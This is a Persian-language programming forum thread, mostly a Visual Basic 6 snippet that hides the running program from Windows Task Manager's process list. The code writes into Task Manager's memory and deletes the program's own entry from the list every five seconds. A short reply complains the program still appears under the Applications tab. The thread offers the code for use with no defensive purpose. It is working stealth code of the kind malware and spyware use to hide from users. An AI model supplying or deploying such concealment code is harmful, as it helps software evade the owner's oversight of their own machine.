کد پنهان کردن برنامه از لیست پراسس های task manager

بازدید49.4kپست ها1آخرین فعالیت7 سال پیش
0
0
Private Type bkh
flag As Long
psz As Long
lParam As Long
pt As Long
vkDirection As Long
End Type
Private Declare Function VirtualAllocEx Lib "kernel32.dll" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetWindowThreadProcessId Lib "user32.dll" (ByVal hwnd As Long, ByRef lpdwProcessId As Long) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function VirtualFreeEx Lib "kernel32.dll" (ByVal hProcess As Long, ByRef lpAddress As Any, ByRef dwSize As Long, ByVal dwFreeType As Long) As Long
Private Declare Function SendMessage Lib "user32.dll" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Private Declare Function GetCurrentProcessId Lib "kernel32.dll" () As Long
Private Declare Function KillTimer Lib "user32.dll" (ByVal hwnd As Long, ByVal nIDEvent As Long) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function FindWindowEx Lib "user32.dll" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long

Private Sub Hide_Process(Name As String)
Dim pName As Long
Dim pType As Long
Dim l As Long
Dim Tid As Long
Dim hTid As Long
Dim pid As Long
Dim h As Long
Dim i As Long
Dim hProcess As Long
Dim f As bkh
Dim s As String
Dim bkh() As Byte
h = FindWindow(vbNullString, "Windows Task Manager")
KillTimer h, 0
h = FindWindowEx(h, 0, "#32770", vbNullString)
h = FindWindowEx(h, 0, "SysListView32", vbNullString)
If h = 0 Then Exit Sub
f.flag = 8 Or &H20
Call GetWindowThreadProcessId(h, pid)
hProcess = OpenProcess(1082, 0, pid)
bkh = StrConv(Name, vbFromUnicode)
pName = VirtualAllocEx(hProcess, 0, Len(Name) + 1, &H1000, 4)
WriteProcessMemory hProcess, pName, VarPtr(bkh(0)), Len(Name), l
f.psz = pName
pType = VirtualAllocEx(hProcess, 0, Len(f), &H1000, 4)
WriteProcessMemory hProcess, pType, VarPtr(f.flag), Len(f), l
i = SendMessage(h, &H1000 + 13, 0, pType)
If i <> -1 Then SendMessage h, &H1000 + 8, i, 0
VirtualFreeEx hProcess, pType, Len(f), &H8000
VirtualFreeEx hProcess, pName, LenB(Name) + 1, &H8000
End Sub

Private Sub Form_Load()
Timer1.Enabled = True
Timer1.Interval = 5000
End Sub

Private Sub Timer1_Timer()
Hide_Process CStr(App.EXEName & ".exe")
End Sub
0

خوب بود ولی در application ظاهر میشه با اینکه این کد نوشتم ولی باز نشون میده
App.TaskVisible = False

سوال برنامه نویسی دارید؟

هیچ وقت در پرسیدن سوال شک نکنید

خوش آمدید

برای طرح سوال، ایجاد بحث و فعالیت در سایت نیاز است ابتدا وارد حساب کاربری خود شوید. در صورتی که هنوز عضو سایت نیستید میتوانید در عرض تنها چند ثانیه ثبت نام کنید.